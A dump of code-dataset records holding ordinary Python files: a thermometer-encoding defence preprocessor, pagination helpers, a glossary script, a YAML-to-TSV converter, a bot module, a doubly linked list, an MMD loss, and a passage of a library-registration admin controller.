        :return: Encoded sample with shape `(batch_size, width, height, depth x num_space)`.
        :rtype: `np.ndarray`
        """
        if num_space is not None:
            self.set_params(num_space=num_space)

        # Encode every channel independently and stack the encodings along the
        # last axis (the indexing assumes NHWC layout, per the docstring).
        channels = [self._perchannel(x[:, :, :, c]) for c in range(x.shape[-1])]
        result = np.clip(np.concatenate(channels, axis=3), clip_values[0], clip_values[1])
        return result.astype(NUMPY_DTYPE)

    def _perchannel(self, x):
        """
        Apply thermometer encoding to one channel.

        :param x: Sample to encode with shape `(batch_size, width, height)`.
        :type x: `np.ndarray`
        :return: Encoded sample with shape `(batch_size, width, height, num_space)`.
        :rtype: `np.ndarray`
        """
        # Discretise each value into a level index: pos counts how many
        # thresholds i/num_space (i >= 1) the value strictly exceeds.
        pos = np.zeros(shape=x.shape)
        for i in range(1, self.num_space):
            pos[x > float(i) / self.num_space] += 1

        # One-hot encode the level, then accumulate lower levels into higher
        # ones (reversed order so each column sums the *original* lower
        # columns), producing the cumulative "thermometer" code.
        onehot_rep = to_categorical(pos.reshape(-1), self.num_space)
        for i in reversed(range(1, self.num_space)):
            onehot_rep[:, i] += np.sum(onehot_rep[:, :i], axis=1)

        return onehot_rep.reshape(list(x.shape) + [self.num_space])

    def fit(self, x, y=None, **kwargs):
        """
        No parameters to learn for this method; do nothing.
        """
        pass

    def set_params(self, **kwargs):
        """
        Take in a dictionary of parameters and applies defence-specific checks before saving them as attributes.

        :param num_space: Number of evenly spaced levels within [0, 1].
        :type num_space: `int`
        """
        # Save attack-specific parameters
        super(ThermometerEncoding, self).set_params(**kwargs)

        # PEP 8: prefer isinstance() over an exact type comparison. bool is
        # excluded explicitly so True/False are still rejected, as before.
        if not isinstance(self.num_space, int) or isinstance(self.num_space, bool) \
                or self.num_space <= 0:
            logger.error('Number of evenly spaced levels must be a positive integer.')
            raise ValueError('Number of evenly spaced levels must be a positive integer.')
        return True
| 36.908333 | 120 | 0.665613 |
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import numpy as np
from art.defences.preprocessor import Preprocessor
from art.utils import to_categorical
from art import NUMPY_DTYPE
logger = logging.getLogger(__name__)
class ThermometerEncoding(Preprocessor):
params = ['num_space']
def __init__(self, num_space=10):
super(ThermometerEncoding, self).__init__()
self._is_fitted = True
self.set_params(num_space=num_space)
def __call__(self, x, y=None, num_space=None, clip_values=(0, 1)):
if num_space is not None:
self.set_params(num_space=num_space)
result = []
for c in range(x.shape[-1]):
result.append(self._perchannel(x[:, :, :, c]))
result = np.concatenate(result, axis=3)
result = np.clip(result, clip_values[0], clip_values[1])
return result.astype(NUMPY_DTYPE)
def _perchannel(self, x):
pos = np.zeros(shape=x.shape)
for i in range(1, self.num_space):
pos[x > float(i) / self.num_space] += 1
onehot_rep = to_categorical(pos.reshape(-1), self.num_space)
for i in reversed(range(1, self.num_space)):
onehot_rep[:, i] += np.sum(onehot_rep[:, :i], axis=1)
result = onehot_rep.reshape(list(x.shape) + [self.num_space])
return result
def fit(self, x, y=None, **kwargs):
pass
def set_params(self, **kwargs):
super(ThermometerEncoding, self).set_params(**kwargs)
if type(self.num_space) is not int or self.num_space <= 0:
logger.error('Number of evenly spaced levels must be a positive integer.')
raise ValueError('Number of evenly spaced levels must be a positive integer.')
return True
| true | true |
1c331ddb1997d4e4af5fb713910dc8fbb5641f67 | 1,129 | py | Python | girder/molecules/molecules/utilities/pagination.py | bnmajor/mongochemserver | aa76ab6e7f749c3e893f27e208984b6ed2d4b2b5 | [
"BSD-3-Clause"
] | 14 | 2015-05-04T16:40:48.000Z | 2021-07-13T08:00:30.000Z | girder/molecules/molecules/utilities/pagination.py | bnmajor/mongochemserver | aa76ab6e7f749c3e893f27e208984b6ed2d4b2b5 | [
"BSD-3-Clause"
] | 88 | 2015-07-24T07:58:43.000Z | 2021-02-23T19:37:13.000Z | girder/molecules/molecules/utilities/pagination.py | bnmajor/mongochemserver | aa76ab6e7f749c3e893f27e208984b6ed2d4b2b5 | [
"BSD-3-Clause"
] | 8 | 2015-06-12T20:54:39.000Z | 2021-04-09T01:07:15.000Z | from girder.constants import SortDir
def default_pagination_params(limit=None, offset=None, sort=None):
    """Fill in the standard pagination defaults for any unset value.

    ``limit`` defaults to 25, ``offset`` to 0 and ``sort`` to descending
    ``_id`` order; explicitly supplied values pass through untouched.
    """
    limit = 25 if limit is None else limit
    offset = 0 if offset is None else offset
    sort = [('_id', SortDir.DESCENDING)] if sort is None else sort
    return limit, offset, sort
def parse_pagination_params(params):
    """Extract ``(limit, offset, sort)`` from a request parameter dict.

    Any value missing from ``params`` falls back to the defaults from
    :func:`default_pagination_params`.
    """
    limit, offset, sort = default_pagination_params()
    if not params:
        return limit, offset, sort
    if 'limit' in params:
        limit = int(params['limit'])
    if 'offset' in params:
        offset = int(params['offset'])
    if 'sort' in params and 'sortdir' in params:
        sort = [(params['sort'], int(params['sortdir']))]
    return limit, offset, sort
def search_results_dict(results, num_matches, limit, offset, sort):
    """Package search results in the standard response shape.

    ``sort`` is accepted for signature compatibility with the other
    pagination helpers but is not included in the response.
    """
    return {
        'matches': num_matches,
        'limit': limit,
        'offset': offset,
        'results': results,
    }
| 28.225 | 67 | 0.612046 | from girder.constants import SortDir
def default_pagination_params(limit=None, offset=None, sort=None):
if limit is None:
limit = 25
if offset is None:
offset = 0
if sort is None:
sort = [('_id', SortDir.DESCENDING)]
return limit, offset, sort
def parse_pagination_params(params):
limit, offset, sort = default_pagination_params()
if params:
if 'limit' in params:
limit = int(params['limit'])
if 'offset' in params:
offset = int(params['offset'])
if 'sort' in params and 'sortdir' in params:
sort = [(params['sort'], int(params['sortdir']))]
return limit, offset, sort
def search_results_dict(results, num_matches, limit, offset, sort):
ret = {
'matches': num_matches,
'limit': limit,
'offset': offset,
'results': results
}
return ret
| true | true |
1c331ddd38ebe454abfa15a1da7a1654eb669ea7 | 753 | py | Python | Chapter 6/glossary.py | WilliamJaber/Python-Crash-Course | d87621785011039fbe0b42f0d8b6cd2364246577 | [
"MIT"
] | null | null | null | Chapter 6/glossary.py | WilliamJaber/Python-Crash-Course | d87621785011039fbe0b42f0d8b6cd2364246577 | [
"MIT"
] | null | null | null | Chapter 6/glossary.py | WilliamJaber/Python-Crash-Course | d87621785011039fbe0b42f0d8b6cd2364246577 | [
"MIT"
] | 5 | 2021-09-22T16:53:47.000Z | 2022-03-24T00:56:49.000Z | glossary = {
'integer': 'is colloquially defined as a number that can be written without a fractional component.\n',
'iterate': 'is the repetition of a process in order to generate a sequence of outcomes.\n',
'indentation': 'is an empty space at the beginning of a line that groups particular blocks of code.\n',
'concatinate': 'is the operation of joining character strings end-to-end.\n',
'boolean': 'is a logical data type that can have only the values True or False.\n',
}
# Print each glossary term with a capitalised label, one blank line between.
for term in ("integer", "iterate", "indentation", "concatinate", "boolean"):
    print(f"{term.capitalize()}: {glossary.get(term)}\n")
| 53.785714 | 107 | 0.707835 | glossary = {
'integer': 'is colloquially defined as a number that can be written without a fractional component.\n',
'iterate': 'is the repetition of a process in order to generate a sequence of outcomes.\n',
'indentation': 'is an empty space at the beginning of a line that groups particular blocks of code.\n',
'concatinate': 'is the operation of joining character strings end-to-end.\n',
'boolean': 'is a logical data type that can have only the values True or False.\n',
}
print(f"Integer: {glossary.get('integer')}\n")
print(f"Iterate: {glossary.get('iterate')}\n")
print(f"Indentation: {glossary.get('indentation')}\n")
print(f"Concatinate: {glossary.get('concatinate')}\n")
print(f"Boolean: {glossary.get('boolean')}\n")
| true | true |
1c331edf3f31abdaae2975dbc1c63f484ebad872 | 1,409 | py | Python | generate_tsv.py | mr-martian/PTNK | beb162053af8f73dd276d72205eab4ff28591c64 | [
"MIT"
] | null | null | null | generate_tsv.py | mr-martian/PTNK | beb162053af8f73dd276d72205eab4ff28591c64 | [
"MIT"
] | null | null | null | generate_tsv.py | mr-martian/PTNK | beb162053af8f73dd276d72205eab4ff28591c64 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import yaml
def extract_lang(blob, lang):
    """Expand one language's span table into a per-position word list.

    ``blob[lang]`` maps each word to an inclusive 1-based position range
    written as "a-b".  The result holds one entry per position from 1 up
    to the highest end position, with '' wherever no word applies, and is
    empty when ``lang`` is absent from ``blob``.
    """
    if lang not in blob:
        return []
    word_at = {}
    highest = 0
    for word, span in blob[lang].items():
        start, end = (int(part) for part in span.split('-'))
        highest = max(highest, end)
        for pos in range(start, end + 1):
            word_at[pos] = word
    return [word_at.get(pos, '') for pos in range(1, highest + 1)]
def process_block(blob, langs):
    """Render one aligned block as newline-joined TSV rows.

    Rows where fewer than two languages align (unless every language is
    empty for that row) are dropped, and duplicate rows appear only once.
    """
    rows = []
    columns = [extract_lang(blob, lang) for lang in langs]
    # TODO: check that they're the same length
    for cells_tuple in zip(*columns):
        cells = list(cells_tuple)
        filled = [cell for cell in cells if cell]
        if len(filled) < 2 and len(filled) != len(langs):
            continue
        row = '\t'.join(cells)
        if row not in rows:
            rows.append(row)
    return '\n'.join(rows)
def process_file(fname, langs):
    """Load a YAML file of aligned blocks and render them all as TSV text."""
    with open(fname) as handle:
        blocks = yaml.safe_load(handle)
    rendered = [process_block(block, langs) for block in blocks]
    return '\n'.join(rendered) + '\n'
if __name__ == '__main__':
    import argparse

    cli = argparse.ArgumentParser('Convert YAML source files to TSV.')
    cli.add_argument('infile', action='store')
    cli.add_argument('outfile', action='store')
    cli.add_argument('langs', nargs='+')
    args = cli.parse_args()
    # NOTE(review): looks like leftover debug output — consider removing.
    print(args)
    with open(args.outfile, 'w') as fout:
        fout.write(process_file(args.infile, args.langs))
| 27.627451 | 73 | 0.568488 |
import yaml
def extract_lang(blob, lang):
if lang not in blob:
return []
ret = []
dct = {}
n = 0
for k in blob[lang]:
n1, n2 = blob[lang][k].split('-')
n = max(n, int(n2))
for i in range(int(n1), int(n2)+1):
dct[i] = k
for i in range(1, n+1):
ret.append(dct.get(i, ''))
return ret
def process_block(blob, langs):
ret = []
idents = [extract_lang(blob, l) for l in langs]
for tup in zip(*idents):
ls = list(tup)
real = [s for s in ls if s]
if len(real) < 2 and len(real) != len(langs):
continue
ln = '\t'.join(ls)
if ln not in ret:
ret.append(ln)
return '\n'.join(ret)
def process_file(fname, langs):
with open(fname) as fin:
blob = yaml.safe_load(fin)
blocks = [process_block(b, langs) for b in blob]
return '\n'.join(blocks) + '\n'
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser('Convert YAML source files to TSV.')
parser.add_argument('infile', action='store')
parser.add_argument('outfile', action='store')
parser.add_argument('langs', nargs='+')
args = parser.parse_args()
print(args)
with open(args.outfile, 'w') as fout:
fout.write(process_file(args.infile, args.langs))
| true | true |
1c331efec726708105560f1ead5a3cb0947f2d57 | 2,841 | py | Python | xenon_worker/commands/module.py | NicCardozo/xenon-worker | 90915e9738234db28a7a2dea63dd1f5fa7a5ecea | [
"MIT"
] | 17 | 2020-05-07T14:51:14.000Z | 2022-03-21T16:37:10.000Z | xenon_worker/commands/module.py | NicCardozo/xenon-worker | 90915e9738234db28a7a2dea63dd1f5fa7a5ecea | [
"MIT"
] | 5 | 2020-10-16T13:54:54.000Z | 2020-12-21T15:13:31.000Z | xenon_worker/commands/module.py | NicCardozo/xenon-worker | 90915e9738234db28a7a2dea63dd1f5fa7a5ecea | [
"MIT"
] | 7 | 2020-05-15T14:19:20.000Z | 2021-10-14T03:43:34.000Z | from .command import Command
from datetime import timedelta, datetime
import traceback
import asyncio
class Task:
    """A periodically executed coroutine owned by a module.

    ``units`` either describe a recurring interval (``delta=True``, passed
    straight to ``timedelta``) or a fixed time of day in UTC
    (``delta=False``, read from the "hour"/"minute"/"seconds" keys).
    """

    def __init__(self, callback, delta=True, **units):
        self.delta = delta
        self.callback = callback
        self.units = units
        self.module = None  # Gets filled by bot.add_module

    @property
    def time_to_wait(self):
        """Seconds to sleep until the next scheduled run."""
        if self.delta:
            return timedelta(**self.units).total_seconds()

        # Fixed time-of-day scheduling. BUG FIX: derive the target from the
        # same `now` instead of a second utcnow() call, which could disagree
        # with `now` when the call straddled a second/day boundary.
        # NOTE(review): the key is "seconds" while the others are singular
        # ("hour"/"minute") — confirm callers actually use that spelling.
        now = datetime.utcnow()
        target = now.replace(
            hour=self.units.get("hour", 0),
            minute=self.units.get("minute", 0),
            second=self.units.get("seconds", 0),
            microsecond=0
        )
        remaining = target - now
        if remaining.total_seconds() < 0:
            remaining += timedelta(days=1)
        return remaining.total_seconds()

    def construct(self):
        """Build the endless scheduling coroutine for this task."""
        async def runner():
            while True:
                await asyncio.sleep(self.time_to_wait)
                try:
                    await self.callback(self.module)
                # BUG FIX: a bare `except:` also swallowed
                # asyncio.CancelledError (a BaseException since 3.8), which
                # made the task impossible to cancel.
                except Exception:
                    traceback.print_exc()
        return runner()
class Listener:
    """Wraps an event callback, normalising an ``on_``-prefixed name."""

    def __init__(self, callback, name=None):
        event = name or callback.__name__
        if event.startswith("on_"):
            event = event[3:]
        self.module = None  # Gets filled by bot.add_module
        self.name = event
        self.callback = callback

    async def execute(self, *args, **kwargs):
        """Invoke the callback, prepending the module when one is attached."""
        if self.module is not None:
            await self.callback(self.module, *args, **kwargs)
        else:
            await self.callback(*args, **kwargs)
class Module:
    """Base class for bot modules.

    Subclasses declare commands, listeners and tasks with the static
    decorators below; the properties discover them by attribute inspection.
    """

    def __init__(self, client):
        self.client = client
        self.bot = client

    def _instances_of(self, kind):
        """Yield attributes of this module that are instances of ``kind``."""
        for attr_name in dir(self):
            member = getattr(self, attr_name)
            if isinstance(member, kind):
                yield member

    @property
    def commands(self):
        # A Command with a parent is a subcommand; only top-level commands
        # are exposed here.
        for command in self._instances_of(Command):
            if command.parent is None:
                yield command

    @property
    def listeners(self):
        return self._instances_of(Listener)

    @property
    def tasks(self):
        return self._instances_of(Task)

    @staticmethod
    def command(*args, **kwargs):
        def decorator(callback):
            return Command(callback, *args, **kwargs)
        return decorator

    @staticmethod
    def listener(*args, **kwargs):
        def decorator(callback):
            return Listener(callback, *args, **kwargs)
        return decorator

    @staticmethod
    def task(*args, **kwargs):
        def decorator(callback):
            return Task(callback, *args, **kwargs)
        return decorator
| 25.366071 | 65 | 0.560366 | from .command import Command
from datetime import timedelta, datetime
import traceback
import asyncio
class Task:
def __init__(self, callback, delta=True, **units):
self.delta = delta
self.callback = callback
self.units = units
self.module = None
@property
def time_to_wait(self):
if self.delta:
return timedelta(**self.units).total_seconds()
now = datetime.utcnow()
time = datetime.utcnow().replace(
hour=self.units.get("hour", 0),
minute=self.units.get("minute", 0),
second=self.units.get("seconds", 0),
microsecond=0
)
wait = time - now
if wait.total_seconds() < 0:
wait += timedelta(days=1)
return wait.total_seconds()
def construct(self):
async def coro():
while True:
await asyncio.sleep(self.time_to_wait)
try:
await self.callback(self.module)
except:
traceback.print_exc()
return coro()
class Listener:
def __init__(self, callback, name=None):
name = name or callback.__name__
if name.startswith("on_"):
name = name[3:]
self.module = None
self.name = name
self.callback = callback
async def execute(self, *args, **kwargs):
if self.module is None:
await self.callback(*args, **kwargs)
else:
await self.callback(self.module, *args, **kwargs)
class Module:
def __init__(self, client):
self.client = client
self.bot = client
@property
def commands(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Command) and attr.parent is None:
yield attr
@property
def listeners(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Listener):
yield attr
@property
def tasks(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Task):
yield attr
@staticmethod
def command(*args, **kwargs):
def _predicate(callback):
return Command(callback, *args, **kwargs)
return _predicate
@staticmethod
def listener(*args, **kwargs):
def _predicate(callback):
return Listener(callback, *args, **kwargs)
return _predicate
@staticmethod
def task(*args, **kwargs):
def _predicate(callback):
return Task(callback, *args, **kwargs)
return _predicate
| true | true |
1c331f3d5b497a66325b056d47f208d9d3525d44 | 4,804 | py | Python | DataStructures/DoubleLinkedList.py | jamwine/Data-Structures-and-Algorithm | 9e1377701d7ea60557130e08fca59b1f9ee2ddab | [
"MIT"
] | null | null | null | DataStructures/DoubleLinkedList.py | jamwine/Data-Structures-and-Algorithm | 9e1377701d7ea60557130e08fca59b1f9ee2ddab | [
"MIT"
] | null | null | null | DataStructures/DoubleLinkedList.py | jamwine/Data-Structures-and-Algorithm | 9e1377701d7ea60557130e08fca59b1f9ee2ddab | [
"MIT"
] | 1 | 2020-06-19T19:54:26.000Z | 2020-06-19T19:54:26.000Z | class DoublyLinkedListNode:
    def __init__(self,value):
        # Payload carried by this node.
        self.info=value
        # Links to the neighbouring nodes; both stay None until the node is
        # threaded into a list.
        self.prev=None
        self.next=None
class DoubleLinkedList:
    """Doubly linked list of ``DoublyLinkedListNode`` objects.

    ``self.start`` references the head node, or ``None`` when the list is
    empty.  Methods print status messages (preserving the original CLI
    behaviour) instead of raising on missing elements.
    """
    def __init__(self):
        self.start = None

    def display_list(self):
        """Print every element front-to-back, or an empty-list message."""
        if self.start is None:
            print("List is empty.")
            return
        print("List is:")
        p = self.start
        while p is not None:
            print(p.info, " ", end="")
            p = p.next
        print()

    def count_nodes(self):
        """Print and return the number of nodes in the list."""
        p = self.start
        n = 0
        while p is not None:
            n += 1
            p = p.next
        print("Number of nodes in the list:", n)
        return n

    def search(self, x):
        """Return True (printing the 1-based position) if ``x`` is present."""
        position = 1
        p = self.start
        while p is not None:
            if p.info == x:
                print(x, "is at position:", position)
                return True
            position += 1
            p = p.next
        print(x, "not found in the list.")
        return False

    def insert_in_beginning(self, data):
        """Insert ``data`` before the current head."""
        temp = DoublyLinkedListNode(data)
        if self.start is None:
            # Robustness fix: the original dereferenced self.start.prev and
            # crashed with AttributeError on an empty list.
            self.start = temp
            return
        temp.next = self.start
        self.start.prev = temp
        self.start = temp

    def insert_in_empty_list(self, data):
        """Make ``data`` the sole element of an (assumed empty) list."""
        self.start = DoublyLinkedListNode(data)

    def insert_at_end(self, data):
        """Append ``data`` after the last node."""
        temp = DoublyLinkedListNode(data)
        if self.start is None:
            # Robustness fix: the original crashed (p was None) on an empty
            # list.
            self.start = temp
            return
        p = self.start
        while p.next is not None:
            p = p.next
        p.next = temp
        temp.prev = p

    def create_list(self):
        """Interactively build the list from console input."""
        n = int(input("Enter the number of nodes:"))
        if n == 0:
            return
        data = int(input("Enter the first element to be inserted:"))
        self.insert_in_empty_list(data)
        for i in range(n - 1):
            data = int(input("Enter the next element to be inserted:"))
            self.insert_at_end(data)

    def insert_after(self, data, x):
        """Insert ``data`` immediately after the first node holding ``x``."""
        p = self.start
        while p is not None:
            if p.info == x:
                break
            p = p.next
        if p is None:
            print(x, " not present in the list")
            return
        temp = DoublyLinkedListNode(data)
        temp.prev = p
        temp.next = p.next
        if p.next is not None:
            p.next.prev = temp
        p.next = temp

    def insert_before(self, data, x):
        """Insert ``data`` immediately before the first node holding ``x``."""
        if self.start is None:
            print("List is empty")
            return
        if x == self.start.info:
            # Inserting before the head is the same as inserting at the front.
            self.insert_in_beginning(data)
            return
        p = self.start
        while p is not None:
            if p.info == x:
                break
            p = p.next
        if p is None:
            print(x, "is not present in the list")
            return
        temp = DoublyLinkedListNode(data)
        temp.prev = p.prev
        temp.next = p
        p.prev.next = temp
        p.prev = temp

    def delete_node(self, x):
        """Delete the first node holding ``x``; print a message otherwise."""
        if self.start is None:
            print("List is empty")
            # BUG FIX: the original fell through here and crashed with an
            # AttributeError on self.start.next.
            return
        if self.start.next is None:
            if self.start.info == x:
                self.start = None
            else:
                print(x, 'not found')
            return
        if self.start.info == x:
            self.start = self.start.next
            self.start.prev = None
            return
        p = self.start.next
        while p.next is not None:
            if p.info == x:
                break
            p = p.next
        if p.next is not None:
            # Found somewhere in the middle: unlink p from both neighbours.
            p.prev.next = p.next
            p.next.prev = p.prev
        elif p.info == x:
            # x is in the last node.
            p.prev.next = None
        else:
            print("Element", x, "is not in the list")

    def delete_first_node(self):
        """Remove the head node, if any."""
        if self.start is None:
            return
        if self.start.next is None:
            self.start = None
            return
        self.start = self.start.next
        self.start.prev = None

    def delete_last_node(self):
        """Remove the tail node, if any."""
        if self.start is None:
            return
        if self.start.next is None:
            self.start = None
            return
        p = self.start
        while p.next is not None:
            p = p.next
        p.prev.next = None

    def reverse_list(self):
        """Reverse the list in place and print a confirmation."""
        if self.start is None:
            return
        p1 = self.start
        p2 = p1.next
        p1.next = None
        p1.prev = p2
        while p2 is not None:
            p2.prev = p2.next
            p2.next = p1
            p1 = p2
            p2 = p2.prev
        self.start = p1
        print("List is reversed")
| 25.827957 | 80 | 0.466694 | class DoublyLinkedListNode:
def __init__(self,value):
self.info=value
self.prev=None
self.next=None
class DoubleLinkedList:
def __init__(self):
self.start=None
def display_list(self):
if self.start is None:
print("List is empty.")
return
else:
print("List is:")
p=self.start
while p is not None:
print(p.info," ",end="")
p=p.next
print()
def count_nodes(self):
p=self.start
n=0
while p is not None:
n+=1
p=p.next
print("Number of nodes in the list:",n)
return n
def search(self,x):
position=1
p=self.start
while p is not None:
if p.info==x:
print(x,"is at position:",position)
return True
position+=1
p=p.next
else:
print(x,"not found in the list.")
return False
def insert_in_beginning(self,data):
temp=DoublyLinkedListNode(data)
temp.next=self.start
self.start.prev=temp
self.start=temp
def insert_in_empty_list(self,data):
temp=DoublyLinkedListNode(data)
self.start=temp
def insert_at_end(self,data):
temp=DoublyLinkedListNode(data)
p=self.start
while p.next is not None:
p=p.next
p.next=temp
temp.prev=p
def create_list(self):
n=int(input("Enter the number of nodes:"))
if n==0:
return
data=int(input("Enter the first element to be inserted:"))
self.insert_in_empty_list(data)
for i in range(n-1):
data=int(input("Enter the next element to be inserted:"))
self.insert_at_end(data)
def insert_after(self,data,x):
temp=DoublyLinkedListNode(data)
p=self.start
while p is not None:
if p.info==x:
break
p=p.next
if p is None:
print(x," not present in the list")
else:
temp.prev=p
temp.next=p.next
if p.next is not None:
p.next.prev=temp
p.next=temp
def insert_before(self,data,x):
if self.start is None:
print("List is empty")
return
if x==self.start.info:
temp=DoublyLinkedListNode(data)
temp.next=self.start
self.start.prev=temp
self.start=temp
return
p=self.start
while p is not None:
if p.info==x:
break
p=p.next
if p is None:
print(x,"is not present in the list")
else:
temp=DoublyLinkedListNode(data)
temp.prev=p.prev
temp.next=p
p.prev.next=temp
p.prev=temp
def delete_node(self,x):
if self.start is None:
print("List is empty")
if self.start.next is None:
if self.start.info==x:
self.start=None
else:
print(x,'not found')
return
if self.start.info==x:
self.start=self.start.next
self.start.prev=None
return
p=self.start.next
while p.next is not None:
if p.info==x:
break
p=p.next
if p.next is not None:
p.prev.next=p.next
p.next.prev=p.prev
else:
if p.info==x:
p.prev.next=None
else:
print("Element",x,"is not in the list")
def delete_first_node(self):
if self.start is None:
return
if self.start.next is None:
self.start=None
return
self.start=self.start.next
self.start.prev=None
def delete_last_node(self):
if self.start is None:
return
if self.start.next is None:
self.start=None
return
p=self.start
while p.next is not None:
p=p.next
p.prev.next=None
def reverse_list(self):
if self.start is None:
return
p1=self.start
p2=p1.next
p1.next=None
p1.prev=p2
while p2 is not None:
p2.prev=p2.next
p2.next=p1
p1=p2
p2=p2.prev
self.start=p1
print("List is reversed")
| true | true |
1c3320d62c581e4c4d90edc647893f6ef53ad9c8 | 1,416 | py | Python | src/Loss.py | roshan19041/Causal-Discovery | 900cfc94d9fc3ff3d75366b00bda3acd044ed638 | [
"MIT"
] | 1 | 2020-07-20T00:00:31.000Z | 2020-07-20T00:00:31.000Z | src/Loss.py | roshan19041/Causal-Discovery | 900cfc94d9fc3ff3d75366b00bda3acd044ed638 | [
"MIT"
] | null | null | null | src/Loss.py | roshan19041/Causal-Discovery | 900cfc94d9fc3ff3d75366b00bda3acd044ed638 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 23 18:59:20 2019
@author: roshanprakash
"""
import tensorflow as tf
def compute_loss(generated_data, observed_data):
    """
    Computes the Maximum Mean Discrepancy between generated data and observational data.
    PARAMETERS
    ----------
    - generated_data (numpy array) : the generated data of shape (N, D)
    - observed_data (numpy array) : the corresponding ground truth data of shape (N, D)
    RETURNS
    -------
    - the MMD loss.
    REFERENCE
    ---------
    [1.] Training generative neural networks via Maximum Mean Discrepancy optimization
    [2.] Link : https://arxiv.org/pdf/1505.03906.pdf
    """
    # Number of observed rows; assumes generated_data has the same N -- TODO confirm.
    N = tf.cast(tf.shape(observed_data)[0], dtype=tf.float32)
    # Fixed bandwidth of the Gaussian (RBF) kernel exp(-GAMMA * d^2).
    GAMMA = tf.constant(0.01, dtype=tf.float32, name='gamma')
    # Column of weights: +1/N for the N generated rows, -1/N for the N observed rows.
    MULTIPLIERS = tf.concat([tf.ones([N, 1])/N, tf.ones([N, 1])/-N], axis=0)
    # Stack both sample sets into one (2N, D) matrix so one Gram matrix covers all pairs.
    X = tf.concat(values=[generated_data, observed_data], axis=0)
    DOTS = tf.matmul(X, tf.transpose(X))
    SQUARE_SUMS = tf.transpose(tf.reduce_sum(tf.square(X), axis=1, keepdims=True))
    # Pairwise squared distances: ||x_i||^2 + ||x_j||^2 - 2 * x_i . x_j.
    EXPONENT_TERMS = tf.add_n([tf.scalar_mul(-2, DOTS), tf.broadcast_to(SQUARE_SUMS, tf.shape(DOTS)), \
                               tf.broadcast_to(tf.transpose(SQUARE_SUMS), tf.shape(DOTS))])
    # NOTE(review): MULTIPLIERS is (2N, 1) and broadcasts across kernel ROWS only,
    # i.e. this sums m_i * k(x_i, x_j). The textbook MMD estimator weights pairs
    # by m_i * m_j -- verify against the cited reference implementation.
    MMDLoss = tf.reduce_sum(tf.multiply(MULTIPLIERS, tf.exp(tf.scalar_mul(-GAMMA, EXPONENT_TERMS))))
    return MMDLoss
import tensorflow as tf
def compute_loss(generated_data, observed_data):
    """Return the Gaussian-kernel MMD-style loss between generated and observed samples.

    Both inputs are (N, D) arrays/tensors; the result is a scalar tensor.
    """
    n = tf.cast(tf.shape(observed_data)[0], dtype=tf.float32)
    gamma = tf.constant(0.01, dtype=tf.float32, name='gamma')
    # +1/n weights for generated rows, -1/n for observed rows.
    signs = tf.concat([tf.ones([n, 1]) / n, tf.ones([n, 1]) / -n], axis=0)
    stacked = tf.concat(values=[generated_data, observed_data], axis=0)
    gram = tf.matmul(stacked, tf.transpose(stacked))
    sq_norms = tf.transpose(tf.reduce_sum(tf.square(stacked), axis=1, keepdims=True))
    # Pairwise squared distances assembled from the Gram matrix and row norms.
    sq_dists = tf.add_n([
        tf.scalar_mul(-2, gram),
        tf.broadcast_to(sq_norms, tf.shape(gram)),
        tf.broadcast_to(tf.transpose(sq_norms), tf.shape(gram)),
    ])
    return tf.reduce_sum(tf.multiply(signs, tf.exp(tf.scalar_mul(-gamma, sq_dists))))
1c33219ed2e9b4b02b73a62e759b3bb6b3f1a3e0 | 5,242 | py | Python | api/admin/controller/discovery_service_library_registrations.py | aseefahmed/circulation | 17cbc9186ab3cde9606912559f92b393ac18ecaa | [
"Apache-2.0"
] | null | null | null | api/admin/controller/discovery_service_library_registrations.py | aseefahmed/circulation | 17cbc9186ab3cde9606912559f92b393ac18ecaa | [
"Apache-2.0"
] | 44 | 2022-01-20T01:31:32.000Z | 2022-03-31T01:50:41.000Z | api/admin/controller/discovery_service_library_registrations.py | jonathangreen/circulation | 118866f8257e2a97431a28ea5ba8e34e5bd393eb | [
"Apache-2.0"
] | null | null | null | import json
import flask
from flask import Response
from flask_babel import lazy_gettext as _
from api.admin.problem_details import *
from api.registration.registry import Registration, RemoteRegistry
from core.model import ExternalIntegration, Library, get_one
from core.util.http import HTTP
from core.util.problem_detail import ProblemDetail
from . import SettingsController
class DiscoveryServiceLibraryRegistrationsController(SettingsController):
    """Admin controller for library registrations held by discovery services.

    Supports listing every RemoteRegistry together with the libraries
    registered against it, and registering a library with a RemoteRegistry.

    :param registration_class: Mock class to use instead of Registration.
    """

    def __init__(self, manager):
        super(DiscoveryServiceLibraryRegistrationsController, self).__init__(manager)
        self.goal = ExternalIntegration.DISCOVERY_GOAL

    def process_discovery_service_library_registrations(
        self,
        registration_class=None,
        do_get=HTTP.debuggable_get,
        do_post=HTTP.debuggable_post,
    ):
        """Dispatch to the GET (list) or POST (register) handler after an admin check."""
        registration_class = registration_class or Registration
        self.require_system_admin()
        if flask.request.method == "GET":
            return self.process_get(do_get)
        return self.process_post(registration_class, do_get, do_post)

    def process_get(self, do_get=HTTP.debuggable_get):
        """List every discovery service with its registered libraries and
        each registration's status."""
        services = []
        registries = RemoteRegistry.for_protocol_and_goal(
            self._db, ExternalIntegration.OPDS_REGISTRATION, self.goal
        )
        for registry in registries:
            document = registry.fetch_registration_document(do_get=do_get)
            if isinstance(document, ProblemDetail):
                # One broken discovery service shouldn't ruin the whole
                # request -- serialize the problem so the client can show it.
                access_problem = json.loads(document.response[0])
                tos_link = tos_html = None
            else:
                access_problem = None
                tos_link, tos_html = document
            libraries = []
            for registration in registry.registrations:
                info = self.get_library_info(registration)
                if info:
                    libraries.append(info)
            services.append(
                dict(
                    id=registry.integration.id,
                    access_problem=access_problem,
                    terms_of_service_link=tos_link,
                    terms_of_service_html=tos_html,
                    libraries=libraries,
                )
            )
        return dict(library_registrations=services)

    def get_library_info(self, registration):
        """Summarize one registration: the library's short name plus, when
        present, the registration stage and status."""
        info = dict(short_name=registration.library.short_name)
        stage = registration.stage_field.value
        status = registration.status_field.value
        if stage:
            info["stage"] = stage
        if status:
            info["status"] = status
        return info

    def look_up_registry(self, integration_id):
        """Return the RemoteRegistry for ``integration_id``, or MISSING_SERVICE."""
        return (
            RemoteRegistry.for_integration_id(self._db, integration_id, self.goal)
            or MISSING_SERVICE
        )

    def look_up_library(self, library_short_name):
        """Return the Library named ``library_short_name``, or NO_SUCH_LIBRARY."""
        return (
